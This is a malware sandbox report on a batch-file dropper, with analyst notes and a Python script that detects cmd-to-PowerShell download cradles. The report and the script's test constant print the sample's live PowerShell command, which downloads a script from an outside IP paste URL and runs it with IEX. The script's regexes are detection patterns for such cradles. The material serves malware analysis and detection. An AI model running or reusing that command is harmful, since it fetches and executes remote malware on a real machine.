Analysis
- max time kernel: 86s
- max time network: 146s
- platform: windows10_x64
- resource: win10
- submitted: 09-07-2020 08:10

Static task: static1

Behavioral task: behavioral1
- Sample: 8f9ff3aa474fa163cb2753cdce6a9abc.bat
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: 8f9ff3aa474fa163cb2753cdce6a9abc.bat
- Resource: win10 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 8f9ff3aa474fa163cb2753cdce6a9abc.bat
- Size: 214B
- MD5: 6583fe9275827519cd2bad15c56e349c
- SHA1: 134d9f2a3be2ede4777cd9216538f582570c21e5
- SHA256: 65aca88b78d41c561c3ab4b732484deb7ba50a7a3b9499406faf938ee12085b8
- SHA512: c96021e32ec898f32c0de82016c899052d36358d1e57512c4b4b0875e1507a7862b5837cb4e5e98b2a5726a059a1593749b0839fac788db9c70bfcdd07dea48b
- Score: 10/10
Malware Config
- Extracted language: ps1
- Source: URLs
- ps1.dropper: http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc
Signatures

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                       pid   process   target PID  target process
  PID 3404 wrote to memory of 3852  3404  cmd.exe   3852        powershell.exe
  (the same entry is reported 3 times)
Note: a parent writing into a child it has just created (here cmd.exe into the powershell.exe it launched) is the normal CreateProcess path and is not by itself evidence of injection; the interesting part of this chain is the PowerShell command line, not the memory write.

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3028  3852        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  3028  WerFault.exe
  Token: SeBackupPrivilege   3028  WerFault.exe
  Token: SeDebugPrivilege    3028  WerFault.exe
Note: these privileges are enabled by WerFault.exe, the Windows Error Reporting handler collecting a dump of the crashed PowerShell process (PID 3852), not by the sample.

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  3028  WerFault.exe
  (14 identical entries)
Note: as above, this is WerFault.exe walking the process list while building the crash report; treat it as noise relative to the dropper chain.
Processes

C:\Windows\system32\cmd.exe (PID 3404)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8f9ff3aa474fa163cb2753cdce6a9abc.bat"
  - Suspicious use of WriteProcessMemory

  └ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3852, child of 3404)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc');Invoke-QAYURDA;Start-Sleep -s 10000"

    └ C:\Windows\SysWOW64\WerFault.exe (PID 3028, child of 3852)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 704
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

What the chain shows: the 214-byte batch file's only observed action is to launch 32-bit (SysWOW64) PowerShell with a one-line download cradle. The cradle fetches a script from the paste URL listed under Malware Config and evaluates it with IEX, calls Invoke-QAYURDA (not a built-in cmdlet, so presumably a function defined by the downloaded script), then sleeps for 10000 seconds to keep the process alive. WerFault.exe is started for PID 3852, so the PowerShell stage crashed during this run and the report records nothing further from it.
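The process tree above is a textbook cmd.exe to powershell.exe download cradle, and the useful detection signal is the command line plus the parent/child relationship, not the WriteProcessMemory or WerFault noise. The following is an added example, not part of the sandbox report: it runs a few constructed process-creation records (Sysmon Event ID 1 style fields ParentImage, Image, CommandLine, which are an assumption for the demo) through rules derived from this chain. Only the PowerShell command line of the second record is taken from the report; the other records, the rule names and the scoring threshold are made up for illustration.

```python
"""Detect the cmd.exe -> powershell.exe download cradle seen in the report.

Added example, not code from the sandbox or the sample. Input records are
constructed in Sysmon Event ID 1 style; only CRADLE's command line is real.
"""
import re
from dataclasses import dataclass, field

# Command line of PID 3852 from the report, split for readability.
CRADLE = (
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
    '"IEX (New-Object System.Net.WebClient).DownloadString('
    "'http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc');"
    'Invoke-QAYURDA;Start-Sleep -s 10000"'
)

# Constructed sample events (assumed field names): the chain from the report
# plus two benign PowerShell launches that should not alert.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\system32\cmd.exe",
        "CommandLine": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8f9ff3aa474fa163cb2753cdce6a9abc.bat"',
    },
    {
        "ParentImage": r"C:\Windows\system32\cmd.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": CRADLE,
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
    },
    {
        "ParentImage": r"C:\Windows\system32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe "Get-Date; Start-Sleep -Seconds 5"',
    },
]

# Cradle = an evaluation primitive AND a fetch primitive in one command line.
CRADLE_EXEC = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
CRADLE_FETCH = re.compile(
    r"(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
SLEEP_RE = re.compile(r"Start-Sleep\s+-s(?:econds)?\s+(\d+)", re.I)
SCRIPT_HOSTS = ("cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")


@dataclass
class Finding:
    image: str
    rules: list = field(default_factory=list)   # names of matched rules
    urls: list = field(default_factory=list)    # URLs pulled from the cradle


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyse(ev):
    """Apply the cradle rules to one process-creation record."""
    image, cmd = ev["Image"], ev["CommandLine"]
    parent = ev.get("ParentImage", "")
    f = Finding(image=image)
    if basename(image) != "powershell.exe":
        return f
    if CRADLE_EXEC.search(cmd) and CRADLE_FETCH.search(cmd):
        f.rules.append("download_cradle")
        f.urls = URL_RE.findall(cmd)           # IoC for blocking / hunting
    if basename(parent) in SCRIPT_HOSTS:
        f.rules.append("spawned_by_" + basename(parent))
    if "\\syswow64\\" in image.lower():        # 32-bit PowerShell on a 64-bit host
        f.rules.append("wow64_powershell")
    m = SLEEP_RE.search(cmd)
    if m and int(m.group(1)) >= 600:           # keep-alive sleep after the payload
        f.rules.append("long_sleep")
    return f


def alerts(events, threshold=2):
    """Return findings with at least `threshold` matched rules."""
    return [f for f in map(analyse, events) if len(f.rules) >= threshold]


if __name__ == "__main__":
    for f in alerts(SAMPLE_EVENTS):
        print(f.image, f.rules, f.urls)
```

The threshold keeps a lone "cmd.exe spawned powershell.exe" (common in logon scripts) from paging anyone, while the real chain trips all four rules and yields the paste URL as a blockable indicator.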